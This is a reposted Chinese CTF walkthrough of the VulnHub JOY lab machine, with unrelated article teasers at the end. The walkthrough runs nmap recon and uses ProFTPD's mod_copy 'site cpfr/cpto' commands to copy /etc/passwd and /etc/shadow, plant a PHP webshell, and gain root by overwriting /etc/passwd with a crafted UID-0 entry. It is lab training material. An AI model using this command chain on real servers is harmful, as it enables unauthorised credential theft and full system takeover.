vulnhub(13):Digitalworld.local JOY(ftp 的未授权文件读写漏洞、文件覆盖提权)

news2024/11/14 6:22:06

端口

nmap主机发现
nmap -sn 192.168.72.0/24
​
Nmap scan report for 192.168.72.171
Host is up (0.00020s latency).
​
171是新出现的机器,他就是靶机
nmap端口扫描
nmap -Pn 192.168.72.171 -p- --min-rate 10000 -oA nmap/scan
扫描开放端口保存到 nmap/scan下
​
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
25/tcp  open  smtp
80/tcp  open  http
110/tcp open  pop3
139/tcp open  netbios-ssn
143/tcp open  imap
445/tcp open  microsoft-ds
465/tcp open  smtps
587/tcp open  submission
993/tcp open  imaps
995/tcp open  pop3s
                                                     
 
这么多端口:995,993,465,143,587,110,25都是邮箱服务
445,139是samba服务
80,22,21是常见的端口
​
以下我对渗透测试优先级排名:
21,80,22尝试枚举足够多的敏感信息加渗透,然后再查看这三个端口是否有服务漏洞
445,139枚举敏感信息,查看是否有可利用的漏洞
邮件服务端口:是否有敏感信息

立足

21端口
upload页面发现信息:
​
directory文件:
drwxr-xr-x 18 patrick patrick 4096 Sep 23 19:40 .
drwxr-xr-x  4 root    root    4096 Jan  6  2019 ..
-rw-------  1 patrick patrick  185 Jan 28  2019 .bash_history
-rw-r--r--  1 patrick patrick  220 Dec 23  2018 .bash_logout
-rw-r--r--  1 patrick patrick 3526 Dec 23  2018 .bashrc
drwx------  7 patrick patrick 4096 Jan 10  2019 .cache
drwx------ 10 patrick patrick 4096 Dec 26  2018 .config
drwxr-xr-x  2 patrick patrick 4096 Dec 26  2018 Desktop
drwxr-xr-x  2 patrick patrick 4096 Dec 26  2018 Documents
drwxr-xr-x  3 patrick patrick 4096 Jan  6  2019 Downloads
drwx------  3 patrick patrick 4096 Dec 26  2018 .gnupg
-rwxrwxrwx  1 patrick patrick    0 Jan  9  2019 haha
-rw-------  1 patrick patrick 8532 Jan 28  2019 .ICEauthority
drwxr-xr-x  3 patrick patrick 4096 Dec 26  2018 .local
drwx------  5 patrick patrick 4096 Dec 28  2018 .mozilla
drwxr-xr-x  2 patrick patrick 4096 Dec 26  2018 Music
drwxr-xr-x  2 patrick patrick 4096 Jan  8  2019 .nano
-rw-r--r--  1 patrick patrick    0 Sep 23 19:40 PebAhabiNhV7N4eiwznehDQzCpydliND.txt
drwxr-xr-x  2 patrick patrick 4096 Dec 26  2018 Pictures
-rw-r--r--  1 patrick patrick  675 Dec 23  2018 .profile
drwxr-xr-x  2 patrick patrick 4096 Dec 26  2018 Public
-rw-r--r--  1 patrick patrick   24 Sep 23 19:40 qbcN77aaMZMzCNKOTlq9jBMrIRO5DshbvdJH1emkdC3ZFTAE7GPCBhZSnljTXHor.txt
d---------  2 root    root    4096 Jan  9  2019 script
drwx------  2 patrick patrick 4096 Dec 26  2018 .ssh
-rw-r--r--  1 patrick patrick    0 Jan  6  2019 Sun
drwxr-xr-x  2 patrick patrick 4096 Dec 26  2018 Templates
-rw-r--r--  1 patrick patrick    0 Jan  6  2019 .txt
-rw-r--r--  1 patrick patrick  407 Jan 27  2019 version_control
drwxr-xr-x  2 patrick patrick 4096 Dec 26  2018 Videos
​
​
这是/home/patrick下的所有文件,其中确实有很多敏感内容
​
还有很多以project开头的文件,查看他们所有内容:
cat project*
​
This is a brave project!
colour
airline
skilled footballer!
Perhaps the head of development is secretly a sicko...
either a dog name, or the name of a lottery in singapore
ONE!
wine app
you only live once!
dog
cat
ant
bird
fish
hare
snake
mouse
eagle
rabbit
jaguar
python
penguin
peacock
phoenix
kangaroo
parakeet
mosquito
mousedeer
woodlouse
cockroach
kingfisher
rhinoceros
pondskater
​
一些名词,一般有三种推测:1.密码 2.用户名 3.没用
看后续场景是否能用到
80端口

是个开源的入侵检测系统,searchsploit 没发现0.8版本漏洞
​
交互的地方也比较少,看看url参数f是否有本地文件包含,最终结果当然没有,一般这种系统也不会出现这么低级错误
​
同时robots.txt页面什么敏感内容都没有
22端口
其报了三个错误,但都能使用参数解决
no matching key exchange method found. Their offer: diffie-hellman-group1-sha1
​
no matching host key type found. Their offer: ssh-rsa,ssh-dss
​
no matching cipher found. Their offer: aes128-cbc,blowfish-cbc,twofish-cbc,3des-cbc
​
ssh 192.168.72.171 -oKexAlgorithms=diffie-hellman-group1-sha1 -oHostKeyAlgorithms=ssh-rsa,ssh-dss -c aes128-cbc 
​
但是又出现一个错误,明显是作者故意而为之:
Connection reset by 192.168.72.171 port 22
​
22端口连接不了
21端口服务漏洞
按照我们的思路接下来查看21,80,22是否有服务漏洞
​
21端口ProFTPD 是1.2.10版本,我们着重挑选1.2.10的版本后的漏洞,我注意到了
1.3.5版本有个file copy的漏洞:看了poc得知,这了漏洞是未授权的敏感文件读写,那么影响力一定很大
​
果不其然我查到了这篇文章:https://gbhackers.com/proftpd-file-copy-vulnerability/
​
文章标题:ProFTPD 的文件复制漏洞使超过 100 万台服务器面临风险
引用文章里的某些话:
ProFTPD 服务器中的文件复制漏洞允许匿名远程攻击者在易受攻击的机器上执行代码,从而导致无需身份验证的远程代码执行和信息泄露。
利用此漏洞,攻击者可以运行具有 Pro-FTPd 服务权限的任何程序代码。此漏洞的编号为CVE-2019-12815,影响 1.3.5b 及以下所有版本。
​
那我们就能尝试一下此漏洞
nc 192.168.72.171 21    
​
220 The Good Tech Inc. FTP Server
site cpfr /etc/passwd
350 File or directory exists, ready for destination name
site cpto /home/ftp/passwd
250 Copy successful
site cpfr /etc/shadow
350 File or directory exists, ready for destination name
site cpto /home/ftp/shadow
250 Copy successful
​
敏感文件先copy过来,但是ssh关闭的,我们只能尝试上传一个shell
为了上传webshell,我们直接把/var/www拷贝过来,目的是能够上传到正确的目录
220 The Good Tech Inc. FTP Server
site cpfr /var/www
350 File or directory exists, ready for destination name
site cpto /home/ftp/www
250 Copy successful
​
发现web主目录如下:
/var/www/tryingharderisjoy/ossec
​
我们直接上传php的webshell
先将shell传给ftp
put shell.php
​
然后拷贝shell.php到web目录
220 The Good Tech Inc. FTP Server
site cpfr /home/ftp/shell.php
350 File or directory exists, ready for destination name
site cpto /var/www/tryingharderisjoy/shell.php
250 Copy successful
​
点击即可getshell

提权

生成密码
openssl passwd -1 -salt hack hack123
生成一个hack123 md5加密的密码hash,然后盐值为hack再加密一次
​
构造字符串追加到passwd
echo "hack:$1$hack$WTn0dk2QjNeKfl.DHOUue0:0:0:root:/root:/bin/bash" >> passwd
上传至ftp并覆盖/etc/passwd
put passwd
​
nc 192.168.72.171
220 The Good Tech Inc. FTP Server
site cpfr /home/ftp/upload/passwd
350 File or directory exists, ready for destination name
site cpto /etc/passwd
250 Copy successful
覆盖后
su hack
password:hack123
成为root
​
root@JOY:~# id
id
uid=0(root) gid=0(root) groups=0(root)

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2160509.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【Android】 IconFont的使用

SVG 的特点: 矢量图形:SVG 使用基于路径的矢量图形,这意味着图形可以无限放大而不失真,非常适合需要多种分辨率的应用。 可伸缩性:SVG 文件的大小通常比位图小,这使得它们在网页上加载更快。 编辑和创作&…

【STM32 ST-LINK Utility】工具使用和如何编译HEX和BIN文件

【STM32 ST-LINK Utility】工具使用和如何编译HEX和BIN文件 一、STM32 ST-LINK UtilitySTM32 ST-LINK Utility简介功能概述: STM32 ST-LINK Utility作用使用场景: 二、KEIL生成HEX和BIN文件1. 生成HEX文件2. 生成BIN文件 三、STM32 ST-LINK Utility烧录1…

【linux经典工具】strace-就十分钟你也能成为性能调优专家

strace 是什么 strace是一款功能强大的 Linux 进程监控和诊断工具。主要作用就是:用于调试程序、解决问题、拦截和记录系统调用以及跟踪正在运行的进程。它能输出了程序如何与系统交互的过程,尤其是在无法获取源代码的情况下(那些开源工具、…

学习threejs,绘制任意字体模型

👨‍⚕️ 主页: gis分享者 👨‍⚕️ 感谢各位大佬 点赞👍 收藏⭐ 留言📝 加关注✅! 👨‍⚕️ 收录于专栏:threejs gis工程师 文章目录 一、🍀前言二、🍀绘制任意字体模型…

前端开发之装饰器模式

介绍 装饰器模式 是在不修改对象内部结构的情况下,动态地给对象添加功能的一种设计模式。在软件开发中,有时候我们需要为已有对象添加一些额外的行为,但不希望修改该对象的代码,装饰器模式可以很好的满足这一需求。 在TypeScrip…

面向AI的数据治理市场前景如何?

面向AI的数据治理市场前景如何? 前言面向AI的数据治理 前言 在这个数字化飞速发展的时代,数据已经成为了我们生活和工作中不可或缺的一部分。就像一把双刃剑,既能为我们带来巨大的机遇,也可能带来一些挑战。而数据治理&#xff0…

[spring]springboot日志

文章目录 一. 日志的用途二. 打印日志三. 日志框架门面模式(外观模式)SLF4J框架介绍 四. 日志格式日志级别配置日志级别日志持久化配置日志文件分割配置日志格式 五. 更简单的日志输出 一. 日志的用途 二. 打印日志 得到日志对象: 需要使用日志工厂LoggerFactory RestControl…

统信服务器操作系统【qcow2 镜像空间扩容】方案

使用 qcow2 镜像安装系统,当默认安装系统存储空间不够用时,进行自定义扩容 文章目录 准备环境扩容步骤一、检查环境信息1.查看镜像信息2.查看镜像分区信息3.确认需要扩容的分区名二、扩容1.备份镜像2.创建新的镜像文件,并指定空间3.将系统扩容到新的镜像三、扩容 lvm 分区四…

OpenCV目标检测(1)模板匹配函数matchTemplate()的使用

操作系统:ubuntu22.04 OpenCV版本:OpenCV4.9 IDE:Visual Studio Code 编程语言:C11 算法描述 将一个模板与重叠的图像区域进行比较。 该函数在图像中滑动,使用指定的方法将大小为 w h w \times h wh的重叠块与模板 templ 进行…

安全运维教程(非常详细)从零基础入门到精通,看完这一篇就够了_网络运维手册

一、安全运维-网络 1、IP地址相关 IP地址属于网络层地址,用于标识网络中的节点设备。 IP地址由32bit构成,每8bit一组,共占用4个字节。 IP地址由两部分组成,网络位和主机位。 IP地址分类: 类别网络位子网掩码私有地…

基于单片机的智能校园照明系统

由于校园用电量较大,本设计可以根据实际环境情况的改变,实现实时照明的控制。本设计以单片机芯片为控制芯片,热释电传感器采集教室中学生出入的信息,并把信息传递给单片机芯片,单片机芯片根据传感器传递过来的信息来控…

004_动手实现MLP(pytorch)

import torch from torch import nn from torch.nn import init import numpy as np import sys import d2lzh_pytorch as d2l # 1.数据预处理 mnist_train torchvision.datasets.FashionMNIST(root/Users/w/PycharmProjects/DeepLearning_with_LiMu/datasets/FashionMnist, t…

水印与标志检测系统源码分享

水印与标志检测检测系统源码分享 [一条龙教学YOLOV8标注好的数据集一键训练_70全套改进创新点发刊_Web前端展示] 1.研究背景与意义 项目参考AAAI Association for the Advancement of Artificial Intelligence 项目来源AACV Association for the Advancement of Computer V…

深度解读数字化转型实施中的常见挑战与解决方案

为何深入理解数字化转型中的挑战至关重要? 数字化转型不仅仅是技术升级的过程,更是企业在面对市场变化、客户需求以及内部效率提升等多方面压力时,进行的系统性变革。然而,数字化转型并非一蹴而就,且在实际实施过程中…

app store预览和截屏最新要求6.9寸截屏,没真机的解决方案

IOS又升级了,最新的iphone 16,新出的iphone 16 pro max是6.9英寸的。 而app store的上架流程也随机更新了,不再需要之前的5.5寸屏截图,改为需要6.9寸屏的截图了 5.5寸那些老古董终于退出历史舞台 但是问题来了,现在…

电源设计的艺术:从底层逻辑到工程实践

在电子工程的世界里,电源设计是核心中的核心。它不仅是电子设备的能量源泉,更是整个系统稳定运行的基石。随着科技的不断进步,电源设计的要求也越来越高,从效率、稳定性到体积、成本,每一个维度都是工程师们不断追求的…

Linux相关概念和重要知识点(7)(git、冯诺依曼体系结构)

1.git (1)版本控制和版本控制器 当我们修改一个项目的时候,一般都会先留下一个备份再修改,并将修改的文件命名为第一次修改、第二次修改......当需要途中的任何版本,或是需要回退到之前的版本时,都能够找…

远程连接服务器时出现“这可能是由于CredSSP加密数据库修正”的错误提示的解决办法

现象: 当远程连接服务器时,有时候会出现以下提示,从而导致无法成功连接服务,如下所述: 原因: 远程桌面使用的是“凭据安全支持提供程序协议 (CredSSP) ”,这个协议在未修补的版本中是存在漏…

焊接缺陷检测系统源码分享

焊接缺陷检测检测系统源码分享 [一条龙教学YOLOV8标注好的数据集一键训练_70全套改进创新点发刊_Web前端展示] 1.研究背景与意义 项目参考AAAI Association for the Advancement of Artificial Intelligence 项目来源AACV Association for the Advancement of Computer Vis…

实现高效物联网通信:MQTT协议深入解析

MQTT(Message Queuing Telemetry Transport)是一种轻量级的消息传输协议,最初由IBM于1999年开发,目的是为了监控远程设备的传感器和嵌入式系统之间的通信。它的目标是提供一种简单、高效、可靠的消息传递机制,以满足低…